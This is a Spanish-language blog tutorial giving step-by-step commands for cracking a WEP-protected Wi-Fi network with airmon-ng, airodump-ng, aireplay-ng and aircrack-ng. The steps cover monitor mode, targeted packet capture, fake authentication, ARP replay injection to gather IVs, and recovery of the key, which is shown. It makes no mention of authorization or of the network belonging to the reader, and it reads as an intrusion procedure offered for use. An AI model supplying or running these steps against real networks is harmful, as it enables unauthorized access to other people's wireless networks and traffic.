Crackear claves Wi-Fi (WEP)

Este tutorial esta realizado en Backtrack 5 r3, pero se puede desarrollar igualmente en cualquier entorno linux, siempre y cuando tengamos la suite de aircrack

En este tutorial mostraré como crackear una red Wi-Fi con seguridad WEP, empecemos:
Iniciamos nuestra maquina, esto lo primero.... XD

El siguiente paso es preparar nuestra tarjeta de red inalambrica para ello lo primero que hay que hacer es abrir una terminal y usar el comando

airmon-ng

Aquí podemos ver nuestras tarjetas de red. Comúnmente la que utilizaremos es wlan0 pero también puede ser ath0 u alguna otra cosa.

Lo siguiente es poner la tarjeta en modo monitor, para ello hay que utilizar el comando

airmon-ng start wlan0

En donde wlan0 es nuestra interfaz de red. Como podemos ver el modo monitor se activó en la interfaz mon0 que es la que utilizaremos de ahora en adelante.

El siguiente paso es escanear las redes disponibles, para ello utilizaremos el comando

airodump-ng mon0

donde

mon0 es nuestra interfaz de red 

y obtendremos lo siguiente:

Después de un rato hay que presionar Ctrl+c para detenerlo. Hay que anotar el canal, y la dirección MAC (BSSID) pues la utilizaremos más adelante.

El siguiente paso es comenzar a capturar los paquetes de la red, para ello utilizaremos el comando

airodump-ng -c (canal) --bssid (bssid) -w (nombre del archivo) mon0

ejem airodump-ng -c 1 --bssid 98:2C:BE:D8:E6:22 -w crackwep mon0

donde:

-c = Canal en donde está la red
--bssid = Dirección Mac de la red
-w = Nombre del archivo en donde se guardaran los paquetes
mon0 = Nuestra interfaz de red

Y aparecerá una ventana parecida a la anterior, pero ahora sólo aparecerá dicha red y se estarán guardando los datos en un archivo en la carpeta root.

Lo siguiente es abrir una nueva pestaña en la terminal y hacer una falsa autentificación para poder inyectar paquetes más adelante. En esta nueva pestaña utilizaremos el comando

aireplay-ng -1 0 -a (bssid) mon0

ejem aireplay-ng -1 0 -a 98:2C:BE:D8:E6:22 mon0

Donde:

-1 = Flag de aireplay para la falsa autentificación, el 0 indica cada cuando se hace la falsa autentificación.
-a = MAC de la red.
mon0 = Nuestra interfaz de red.

Aparecerá algo así:

El siguiente paso es capturar peticiones ARP e inyectarlas para generar paquetes que nos serviran para crackear el pass. Para ello utilizaremos el comando

aireplay-ng -3 -b (bessid)mon0

ejem aireplay-ng -3 -b 98:2C:BE:D8:E6:22 mon0

Donde:

-3 = Flag de aireplay para capturar y reenviar peticiones ARP
-b = MAC de la red
mon0 = Nuestra interfaz de red

y debe aparecer lo siguiente:

Que después de unos minutos debe comenzar a capturar paquetes ARP:

En la siguiente imagen podemos ver como aumentan los Iv's que son los que necesitamos para crackear la pass WEP y aparecen como #Data en la pestaña de airodupm-ng:

Normalmente con 5000 Iv's podemos comenzar a desencriptar la clave, pero con unos 20000 es un poco más seguro, en este caso ya tenemos 18000 y aumentando por lo que ya podemos utilizar aircrack-ng. Para esto vamos a utilizar el domando

ls

Aquí podemos ver los archivos que tenemos en la carpeta root, como podemos ver están los archivos de captura que he tomado para el tutorial así como algunos otros, de aquí el que nos servira es el de crackwep-01.cap Que regresando un poco fue el nombre que le dimos al utilizar en airodump-ng la opción -w, pero sólo habiamos puesto crackwep, es por eso que utilizamos el camndo "ls"

El archivo que utilizaremos siempre será el que tenga la extensión .cap
Ahora que tenemos el nombre, llego la hora de usar aircrack-ng, para esto usaremos el comando

aircrack-ng (archivo.cap)

ejem aircrack-ng crackwep-01.cap

Donde:

crackwep-01.cap es el nombre del archivo que creamos con airodump-ng y en donde se guardan los paquetes. Entonces aparecerá algo así;

Como podemos ver, tuvimos los Iv's suficientes y la clave a parece a un lado de KEY FOUND y aparece entre corchetes; la clave seria "0701714181"

Y bueno eso fue todo :)



http://siteapolo.blogspot.com.es/2012/10/crackear-claves-wep-wi-fi-con-backtrack.html